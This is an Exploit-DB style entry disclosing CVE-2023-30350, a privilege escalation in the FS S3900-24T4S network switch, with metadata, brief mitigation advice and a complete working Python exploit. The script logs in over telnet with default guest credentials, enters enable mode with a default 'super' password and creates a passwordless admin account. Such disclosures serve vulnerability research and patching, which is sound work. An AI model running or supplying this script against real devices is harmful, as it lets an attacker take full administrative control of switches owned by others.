FS-S3900-24T4S Privilege Escalation

vendor:

S3900-24T4S

by:

Daniele Linguaglossa & Alberto Bruscino

7.4

CVSS

HIGH

Privilege Escalation

269

CWE

Product Name: S3900-24T4S

Affected Version From: latest

Affected Version To: latest

Patch Exists: NO

Related CWE: CVE-2023-30350

CPE: h:fs:s3900-24t4s

Metasploit:

Other Scripts:

Platforms Tested: latest

2023

FS-S3900-24T4S Privilege Escalation

This exploit allows an attacker to gain access to the FS-S3900-24T4S device by using the telnet protocol. The attacker can use the guest credentials to login and then use the enable command with the super password to gain access to the device. The attacker can then configure the device to create a new user with admin privileges and no password.

Mitigation:

Disable telnet access and use SSH instead. Use strong passwords for all accounts. Monitor the device for any suspicious activity.

Source

Exploit-DB raw data:

# Exploit Title: FS-S3900-24T4S Privilege Escalation
# Date: 29/04/2023
# Exploit Author: Daniele Linguaglossa & Alberto Bruscino
# Vendor Homepage: https://www.fs.com/
# Software Link: not available
# Version: latest
# Tested on: latest
# CVE : CVE-2023-30350

import sys
import telnetlib


def exploit(args):
    print(args)
    if len(args) != 1:
        print(f"Usage: {sys.argv[0]} <ip>")
        sys.exit(1)
    else:
        ip = args[0]
        try:
            with telnetlib.Telnet(ip, 23) as tn:
                try:
                    tn.read_until(b"Username: ")
                    tn.write(b"guest\r\n")
                    tn.read_until(b"Password: ")
                    tn.write(b"guest\r\n")
                    tn.read_until(b">")
                    tn.write(b"enable\r\n")
                    tn.read_until(b"Password: ")
                    tn.write(b"super\r\n")
                    tn.read_until(b"#")
                    tn.write(b"configure terminal\r\n")
                    tn.read_until(b"(config)#")
                    tn.write(b"username admin nopassword\r\n")
                    tn.read_until(b"(config)#")
                    print(
                        "Exploit success, you can now login with username: admin and password: <empty>")
                    tn.close()
                except KeyboardInterrupt:
                    print("Exploit failed")
                    tn.close()
        except ConnectionRefusedError:
            print("Connection refused")


if __name__ == "__main__":
    exploit(sys.argv[1:])